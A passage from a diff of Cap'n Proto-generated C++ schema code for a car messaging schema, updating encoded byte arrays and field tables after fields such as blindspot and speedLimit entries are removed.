0, 0, - 140, 6, 0, 0, 3, 0, 1, 0, - 152, 6, 0, 0, 2, 0, 1, 0, - 4, 0, 0, 0, 7, 0, 0, 0, - 0, 0, 1, 0, 16, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 149, 6, 0, 0, 42, 0, 0, 0, + 141, 6, 0, 0, 162, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 144, 6, 0, 0, 3, 0, 1, 0, 156, 6, 0, 0, 2, 0, 1, 0, - 5, 0, 0, 0, 8, 0, 0, 0, - 0, 0, 1, 0, 17, 0, 0, 0, + 25, 0, 0, 0, 99, 1, 0, 0, + 0, 0, 1, 0, 36, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 153, 6, 0, 0, 66, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 148, 6, 0, 0, 3, 0, 1, 0, - 160, 6, 0, 0, 2, 0, 1, 0, - 8, 0, 0, 0, 67, 0, 0, 0, - 0, 0, 1, 0, 18, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 157, 6, 0, 0, 90, 0, 0, 0, + 153, 6, 0, 0, 162, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 156, 6, 0, 0, 3, 0, 1, 0, 168, 6, 0, 0, 2, 0, 1, 0, - 51, 0, 0, 0, 68, 0, 0, 0, - 0, 0, 1, 0, 19, 0, 0, 0, + 19, 0, 0, 0, 12, 0, 0, 0, + 0, 0, 1, 0, 37, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 165, 6, 0, 0, 178, 0, 0, 0, + 165, 6, 0, 0, 186, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 168, 6, 0, 0, 3, 0, 1, 0, 180, 6, 0, 0, 2, 0, 1, 0, - 34, 0, 0, 0, 69, 0, 0, 0, - 0, 0, 1, 0, 20, 0, 0, 0, + 17, 0, 0, 0, 100, 1, 0, 0, + 0, 0, 1, 0, 38, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 177, 6, 0, 0, 98, 0, 0, 0, + 177, 6, 0, 0, 130, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 176, 6, 0, 0, 3, 0, 1, 0, 188, 6, 0, 0, 2, 0, 1, 0, - 35, 0, 0, 0, 70, 0, 0, 0, - 0, 0, 1, 0, 21, 0, 0, 0, + 16, 0, 0, 0, 101, 1, 0, 0, + 0, 0, 1, 0, 39, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 185, 6, 0, 0, 106, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 184, 6, 0, 0, 3, 0, 1, 0, 196, 6, 0, 0, 2, 0, 1, 0, - 7, 0, 0, 0, 9, 0, 0, 0, - 0, 0, 1, 0, 22, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 193, 6, 0, 0, 66, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 188, 6, 0, 0, 3, 0, 1, 0, - 200, 6, 0, 0, 2, 0, 1, 0, - 36, 0, 0, 0, 71, 0, 0, 0, - 0, 0, 1, 0, 23, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 197, 6, 0, 0, 114, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 196, 6, 0, 0, 3, 0, 1, 0, - 208, 6, 0, 0, 2, 0, 1, 0, - 37, 0, 0, 0, 72, 0, 0, 0, - 0, 0, 1, 0, 24, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 205, 6, 0, 0, 74, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 204, 6, 0, 0, 3, 0, 1, 0, - 216, 6, 0, 0, 2, 0, 1, 0, - 38, 0, 0, 0, 73, 0, 0, 0, - 0, 0, 1, 0, 25, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 213, 6, 0, 0, 146, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 216, 6, 0, 0, 3, 0, 1, 0, - 228, 6, 0, 0, 2, 0, 1, 0, - 1, 0, 0, 0, 74, 0, 0, 0, - 0, 0, 1, 0, 26, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 225, 6, 0, 0, 74, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 224, 6, 0, 0, 3, 0, 1, 0, - 236, 6, 0, 0, 2, 0, 1, 0, - 22, 0, 0, 0, 10, 0, 0, 0, - 0, 0, 1, 0, 27, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 233, 6, 0, 0, 146, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 236, 6, 0, 0, 3, 0, 1, 0, - 248, 6, 0, 0, 2, 0, 1, 0, - 39, 0, 0, 0, 75, 0, 0, 0, - 0, 0, 1, 0, 28, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 245, 6, 0, 0, 114, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 244, 6, 0, 0, 3, 0, 1, 0, - 0, 7, 0, 0, 2, 0, 1, 0, - 52, 0, 0, 0, 76, 0, 0, 0, - 0, 0, 1, 0, 29, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 253, 6, 0, 0, 242, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 4, 7, 0, 0, 3, 0, 1, 0, - 16, 7, 0, 0, 2, 0, 1, 0, - 26, 0, 0, 0, 77, 0, 0, 0, - 0, 0, 1, 0, 30, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 13, 7, 0, 0, 74, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 12, 7, 0, 0, 3, 0, 1, 0, - 24, 7, 0, 0, 2, 0, 1, 0, - 27, 0, 0, 0, 78, 0, 0, 0, - 0, 0, 1, 0, 31, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 21, 7, 0, 0, 74, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 20, 7, 0, 0, 3, 0, 1, 0, - 32, 7, 0, 0, 2, 0, 1, 0, - 28, 0, 0, 0, 79, 0, 0, 0, - 0, 0, 1, 0, 32, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 29, 7, 0, 0, 98, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 28, 7, 0, 0, 3, 0, 1, 0, - 40, 7, 0, 0, 2, 0, 1, 0, - 40, 0, 0, 0, 96, 1, 0, 0, - 0, 0, 1, 0, 33, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 37, 7, 0, 0, 114, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 36, 7, 0, 0, 3, 0, 1, 0, - 48, 7, 0, 0, 2, 0, 1, 0, - 41, 0, 0, 0, 97, 1, 0, 0, - 0, 0, 1, 0, 34, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 45, 7, 0, 0, 122, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 44, 7, 0, 0, 3, 0, 1, 0, - 56, 7, 0, 0, 2, 0, 1, 0, - 24, 0, 0, 0, 98, 1, 0, 0, - 0, 0, 1, 0, 35, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 53, 7, 0, 0, 162, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 56, 7, 0, 0, 3, 0, 1, 0, - 68, 7, 0, 0, 2, 0, 1, 0, - 25, 0, 0, 0, 99, 1, 0, 0, - 0, 0, 1, 0, 36, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 65, 7, 0, 0, 162, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 68, 7, 0, 0, 3, 0, 1, 0, - 80, 7, 0, 0, 2, 0, 1, 0, - 19, 0, 0, 0, 12, 0, 0, 0, - 0, 0, 1, 0, 37, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 77, 7, 0, 0, 186, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 80, 7, 0, 0, 3, 0, 1, 0, - 92, 7, 0, 0, 2, 0, 1, 0, - 17, 0, 0, 0, 100, 1, 0, 0, - 0, 0, 1, 0, 38, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 89, 7, 0, 0, 130, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 88, 7, 0, 0, 3, 0, 1, 0, - 100, 7, 0, 0, 2, 0, 1, 0, - 16, 0, 0, 0, 101, 1, 0, 0, - 0, 0, 1, 0, 39, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 97, 7, 0, 0, 106, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 96, 7, 0, 0, 3, 0, 1, 0, - 108, 7, 0, 0, 2, 0, 1, 0, 2, 0, 0, 0, 102, 1, 0, 0, 0, 0, 1, 0, 40, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 105, 7, 0, 0, 90, 0, 0, 0, + 193, 6, 0, 0, 90, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 104, 7, 0, 0, 3, 0, 1, 0, - 116, 7, 0, 0, 2, 0, 1, 0, + 192, 6, 0, 0, 3, 0, 1, 0, + 204, 6, 0, 0, 2, 0, 1, 0, 42, 0, 0, 0, 13, 0, 0, 0, 0, 0, 1, 0, 41, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 113, 7, 0, 0, 82, 0, 0, 0, + 201, 6, 0, 0, 82, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 112, 7, 0, 0, 3, 0, 1, 0, - 124, 7, 0, 0, 2, 0, 1, 0, + 200, 6, 0, 0, 3, 0, 1, 0, + 212, 6, 0, 0, 2, 0, 1, 0, 29, 0, 0, 0, 103, 1, 0, 0, 0, 0, 1, 0, 42, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 121, 7, 0, 0, 90, 0, 0, 0, + 209, 6, 0, 0, 90, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 120, 7, 0, 0, 3, 0, 1, 0, - 132, 7, 0, 0, 2, 0, 1, 0, + 208, 6, 0, 0, 3, 0, 1, 0, + 220, 6, 0, 0, 2, 0, 1, 0, 43, 0, 0, 0, 104, 1, 0, 0, 0, 0, 1, 0, 43, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 129, 7, 0, 0, 74, 0, 0, 0, + 217, 6, 0, 0, 74, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 128, 7, 0, 0, 3, 0, 1, 0, - 140, 7, 0, 0, 2, 0, 1, 0, + 216, 6, 0, 0, 3, 0, 1, 0, + 228, 6, 0, 0, 2, 0, 1, 0, 6, 0, 0, 0, 14, 0, 0, 0, 0, 0, 1, 0, 44, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 137, 7, 0, 0, 98, 0, 0, 0, + 225, 6, 0, 0, 98, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 136, 7, 0, 0, 3, 0, 1, 0, - 148, 7, 0, 0, 2, 0, 1, 0, + 224, 6, 0, 0, 3, 0, 1, 0, + 236, 6, 0, 0, 2, 0, 1, 0, 15, 0, 0, 0, 105, 1, 0, 0, 0, 0, 1, 0, 45, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 145, 7, 0, 0, 106, 0, 0, 0, + 233, 6, 0, 0, 106, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 144, 7, 0, 0, 3, 0, 1, 0, - 156, 7, 0, 0, 2, 0, 1, 0, + 232, 6, 0, 0, 3, 0, 1, 0, + 244, 6, 0, 0, 2, 0, 1, 0, 12, 0, 0, 0, 15, 0, 0, 0, 0, 0, 1, 0, 46, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 153, 7, 0, 0, 82, 0, 0, 0, + 241, 6, 0, 0, 82, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 152, 7, 0, 0, 3, 0, 1, 0, - 164, 7, 0, 0, 2, 0, 1, 0, + 240, 6, 0, 0, 3, 0, 1, 0, + 252, 6, 0, 0, 2, 0, 1, 0, 30, 0, 0, 0, 106, 1, 0, 0, 0, 0, 1, 0, 47, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 161, 7, 0, 0, 178, 0, 0, 0, + 249, 6, 0, 0, 178, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 164, 7, 0, 0, 3, 0, 1, 0, - 176, 7, 0, 0, 2, 0, 1, 0, - 44, 0, 0, 0, 46, 0, 0, 0, - 0, 0, 1, 0, 48, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 173, 7, 0, 0, 114, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 172, 7, 0, 0, 3, 0, 1, 0, - 184, 7, 0, 0, 2, 0, 1, 0, - 45, 0, 0, 0, 16, 0, 0, 0, - 0, 0, 1, 0, 49, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 181, 7, 0, 0, 138, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 184, 7, 0, 0, 3, 0, 1, 0, - 196, 7, 0, 0, 2, 0, 1, 0, - 46, 0, 0, 0, 17, 0, 0, 0, - 0, 0, 1, 0, 50, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 193, 7, 0, 0, 138, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 196, 7, 0, 0, 3, 0, 1, 0, - 208, 7, 0, 0, 2, 0, 1, 0, - 47, 0, 0, 0, 18, 0, 0, 0, - 0, 0, 1, 0, 51, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 205, 7, 0, 0, 130, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 204, 7, 0, 0, 3, 0, 1, 0, - 216, 7, 0, 0, 2, 0, 1, 0, - 48, 0, 0, 0, 19, 0, 0, 0, - 0, 0, 1, 0, 52, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 213, 7, 0, 0, 130, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 212, 7, 0, 0, 3, 0, 1, 0, - 224, 7, 0, 0, 2, 0, 1, 0, - 49, 0, 0, 0, 20, 0, 0, 0, - 0, 0, 1, 0, 53, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 221, 7, 0, 0, 114, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 220, 7, 0, 0, 3, 0, 1, 0, - 232, 7, 0, 0, 2, 0, 1, 0, + 252, 6, 0, 0, 3, 0, 1, 0, + 8, 7, 0, 0, 2, 0, 1, 0, 101, 114, 114, 111, 114, 115, 68, 69, 80, 82, 69, 67, 65, 84, 69, 68, 0, 0, 0, 0, 0, 0, 0, 0, @@ -1807,62 +1734,6 @@ static const ::capnp::_::AlignedData<920> b_9da4fa09e052903c = { 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 100, 105, 115, 116, 97, 110, 99, 101, - 76, 105, 110, 101, 115, 0, 0, 0, - 6, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 6, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 114, 105, 103, 104, 116, 66, 108, 105, - 110, 100, 115, 112, 111, 116, 68, 49, - 0, 0, 0, 0, 0, 0, 0, 0, - 10, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 10, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 114, 105, 103, 104, 116, 66, 108, 105, - 110, 100, 115, 112, 111, 116, 68, 50, - 0, 0, 0, 0, 0, 0, 0, 0, - 10, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 10, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 108, 101, 102, 116, 66, 108, 105, 110, - 100, 115, 112, 111, 116, 68, 49, 0, - 10, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 10, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 108, 101, 102, 116, 66, 108, 105, 110, - 100, 115, 112, 111, 116, 68, 50, 0, - 10, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 10, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 98, 108, 105, 110, 100, 115, 112, 111, - 116, 115, 105, 100, 101, 0, 0, 0, - 10, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 10, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, } }; @@ -1876,11 +1747,11 @@ static const ::capnp::_::RawSchema* const d_9da4fa09e052903c[] = { &s_e64e81478e6e60af, &s_ff5ca6835b4acef6, }; -static const uint16_t m_9da4fa09e052903c[] = {16, 42, 53, 5, 38, 19, 6, 11, 12, 40, 26, 47, 43, 28, 10, 48, 24, 46, 0, 32, 13, 41, 3, 4, 14, 23, 33, 51, 52, 20, 39, 45, 34, 49, 50, 21, 25, 18, 36, 35, 7, 37, 9, 15, 29, 8, 27, 30, 31, 1, 44, 17, 2, 22}; -static const uint16_t i_9da4fa09e052903c[] = {0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39, 40, 41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51, 52, 53}; +static const uint16_t m_9da4fa09e052903c[] = {16, 42, 5, 38, 19, 6, 11, 12, 40, 26, 47, 43, 28, 10, 24, 46, 0, 32, 13, 41, 3, 4, 14, 23, 33, 20, 39, 45, 34, 21, 25, 18, 36, 35, 7, 37, 9, 15, 29, 8, 27, 30, 31, 1, 44, 17, 2, 22}; +static const uint16_t i_9da4fa09e052903c[] = {0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39, 40, 41, 42, 43, 44, 45, 46, 47}; const ::capnp::_::RawSchema s_9da4fa09e052903c = { - 0x9da4fa09e052903c, b_9da4fa09e052903c.words, 920, d_9da4fa09e052903c, m_9da4fa09e052903c, - 6, 54, i_9da4fa09e052903c, nullptr, nullptr, { &s_9da4fa09e052903c, nullptr, nullptr, 0, 0, nullptr } + 0x9da4fa09e052903c, b_9da4fa09e052903c.words, 822, d_9da4fa09e052903c, m_9da4fa09e052903c, + 6, 48, i_9da4fa09e052903c, nullptr, nullptr, { &s_9da4fa09e052903c, nullptr, nullptr, 0, 0, nullptr } }; #endif // !CAPNP_LITE static const ::capnp::_::AlignedData<78> b_991a37a6155935a3 = { @@ -1972,17 +1843,17 @@ const ::capnp::_::RawSchema s_991a37a6155935a3 = { 0, 4, i_991a37a6155935a3, nullptr, nullptr, { &s_991a37a6155935a3, nullptr, nullptr, 0, 0, nullptr } }; #endif // !CAPNP_LITE -static const ::capnp::_::AlignedData<144> b_e64e81478e6e60af = { +static const ::capnp::_::AlignedData<128> b_e64e81478e6e60af = { { 0, 0, 0, 0, 5, 0, 6, 0, 175, 96, 110, 142, 71, 129, 78, 230, - 19, 0, 0, 0, 1, 0, 3, 0, + 19, 0, 0, 0, 1, 0, 2, 0, 60, 144, 82, 224, 9, 250, 164, 157, 0, 0, 7, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 21, 0, 0, 0, 250, 0, 0, 0, 33, 0, 0, 0, 7, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 29, 0, 0, 0, 199, 1, 0, 0, + 29, 0, 0, 0, 143, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 99, 97, 114, 46, 99, 97, 112, 110, @@ -1990,63 +1861,56 @@ static const ::capnp::_::AlignedData<144> b_e64e81478e6e60af = { 116, 101, 46, 67, 114, 117, 105, 115, 101, 83, 116, 97, 116, 101, 0, 0, 0, 0, 0, 0, 1, 0, 1, 0, - 32, 0, 0, 0, 3, 0, 4, 0, + 28, 0, 0, 0, 3, 0, 4, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 209, 0, 0, 0, 66, 0, 0, 0, + 181, 0, 0, 0, 66, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 204, 0, 0, 0, 3, 0, 1, 0, - 216, 0, 0, 0, 2, 0, 1, 0, + 176, 0, 0, 0, 3, 0, 1, 0, + 188, 0, 0, 0, 2, 0, 1, 0, 1, 0, 0, 0, 1, 0, 0, 0, 0, 0, 1, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 213, 0, 0, 0, 50, 0, 0, 0, + 185, 0, 0, 0, 50, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 208, 0, 0, 0, 3, 0, 1, 0, - 220, 0, 0, 0, 2, 0, 1, 0, + 180, 0, 0, 0, 3, 0, 1, 0, + 192, 0, 0, 0, 2, 0, 1, 0, 3, 0, 0, 0, 1, 0, 0, 0, 0, 0, 1, 0, 2, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 217, 0, 0, 0, 82, 0, 0, 0, + 189, 0, 0, 0, 82, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 216, 0, 0, 0, 3, 0, 1, 0, - 228, 0, 0, 0, 2, 0, 1, 0, + 188, 0, 0, 0, 3, 0, 1, 0, + 200, 0, 0, 0, 2, 0, 1, 0, 4, 0, 0, 0, 2, 0, 0, 0, 0, 0, 1, 0, 3, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 225, 0, 0, 0, 98, 0, 0, 0, + 197, 0, 0, 0, 98, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 224, 0, 0, 0, 3, 0, 1, 0, - 236, 0, 0, 0, 2, 0, 1, 0, + 196, 0, 0, 0, 3, 0, 1, 0, + 208, 0, 0, 0, 2, 0, 1, 0, 5, 0, 0, 0, 2, 0, 0, 0, 0, 0, 1, 0, 4, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 233, 0, 0, 0, 90, 0, 0, 0, + 205, 0, 0, 0, 90, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 232, 0, 0, 0, 3, 0, 1, 0, - 244, 0, 0, 0, 2, 0, 1, 0, + 204, 0, 0, 0, 3, 0, 1, 0, + 216, 0, 0, 0, 2, 0, 1, 0, 6, 0, 0, 0, 3, 0, 0, 0, 0, 0, 1, 0, 5, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 241, 0, 0, 0, 98, 0, 0, 0, + 213, 0, 0, 0, 98, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 240, 0, 0, 0, 3, 0, 1, 0, - 252, 0, 0, 0, 2, 0, 1, 0, + 212, 0, 0, 0, 3, 0, 1, 0, + 224, 0, 0, 0, 2, 0, 1, 0, 2, 0, 0, 0, 3, 0, 0, 0, 0, 0, 1, 0, 6, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 249, 0, 0, 0, 106, 0, 0, 0, + 221, 0, 0, 0, 106, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 248, 0, 0, 0, 3, 0, 1, 0, - 4, 1, 0, 0, 2, 0, 1, 0, - 7, 0, 0, 0, 4, 0, 0, 0, - 0, 0, 1, 0, 7, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 1, 1, 0, 0, 90, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 1, 0, 0, 3, 0, 1, 0, - 12, 1, 0, 0, 2, 0, 1, 0, + 220, 0, 0, 0, 3, 0, 1, 0, + 232, 0, 0, 0, 2, 0, 1, 0, 101, 110, 97, 98, 108, 101, 100, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, @@ -2101,15 +1965,6 @@ static const ::capnp::_::AlignedData<144> b_e64e81478e6e60af = { 0, 0, 0, 0, 0, 0, 0, 0, 115, 112, 101, 101, 100, 67, 108, 117, 115, 116, 101, 114, 0, 0, 0, 0, - 10, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 10, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 115, 112, 101, 101, 100, 76, 105, 109, - 105, 116, 0, 0, 0, 0, 0, 0, 10, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, @@ -2120,11 +1975,11 @@ static const ::capnp::_::AlignedData<144> b_e64e81478e6e60af = { }; ::capnp::word const* const bp_e64e81478e6e60af = b_e64e81478e6e60af.words; #if !CAPNP_LITE -static const uint16_t m_e64e81478e6e60af[] = {2, 0, 5, 1, 6, 7, 3, 4}; -static const uint16_t i_e64e81478e6e60af[] = {0, 1, 2, 3, 4, 5, 6, 7}; +static const uint16_t m_e64e81478e6e60af[] = {2, 0, 5, 1, 6, 3, 4}; +static const uint16_t i_e64e81478e6e60af[] = {0, 1, 2, 3, 4, 5, 6}; const ::capnp::_::RawSchema s_e64e81478e6e60af = { - 0xe64e81478e6e60af, b_e64e81478e6e60af.words, 144, nullptr, m_e64e81478e6e60af, - 0, 8, i_e64e81478e6e60af, nullptr, nullptr, { &s_e64e81478e6e60af, nullptr, nullptr, 0, 0, nullptr } + 0xe64e81478e6e60af, b_e64e81478e6e60af.words, 128, nullptr, m_e64e81478e6e60af, + 0, 7, i_e64e81478e6e60af, nullptr, nullptr, { &s_e64e81478e6e60af, nullptr, nullptr, 0, 0, nullptr } }; #endif // !CAPNP_LITE static const ::capnp::_::AlignedData<59> b_e004ca45136f6a89 = { @@ -2626,17 +2481,17 @@ const ::capnp::_::RawSchema s_8ff333ebac1fdf36 = { 0, 7, i_8ff333ebac1fdf36, nullptr, nullptr, { &s_8ff333ebac1fdf36, nullptr, nullptr, 0, 0, nullptr } }; #endif // !CAPNP_LITE -static const ::capnp::_::AlignedData<327> b_f78829049ab814af = { +static const ::capnp::_::AlignedData<311> b_f78829049ab814af = { { 0, 0, 0, 0, 5, 0, 6, 0, 175, 20, 184, 154, 4, 41, 136, 247, 10, 0, 0, 0, 1, 0, 3, 0, 141, 139, 175, 8, 231, 241, 42, 142, - 7, 0, 7, 0, 0, 0, 0, 0, + 6, 0, 7, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 21, 0, 0, 0, 170, 0, 0, 0, 29, 0, 0, 0, 55, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 73, 0, 0, 0, 247, 3, 0, 0, + 73, 0, 0, 0, 191, 3, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 99, 97, 114, 46, 99, 97, 112, 110, @@ -2655,133 +2510,126 @@ static const ::capnp::_::AlignedData<327> b_f78829049ab814af = { 110, 116, 114, 111, 108, 0, 0, 0, 72, 85, 68, 67, 111, 110, 116, 114, 111, 108, 0, 0, 0, 0, 0, 0, - 72, 0, 0, 0, 3, 0, 4, 0, + 68, 0, 0, 0, 3, 0, 4, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 233, 1, 0, 0, 66, 0, 0, 0, + 205, 1, 0, 0, 66, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 228, 1, 0, 0, 3, 0, 1, 0, - 240, 1, 0, 0, 2, 0, 1, 0, - 12, 0, 0, 0, 1, 0, 0, 0, + 200, 1, 0, 0, 3, 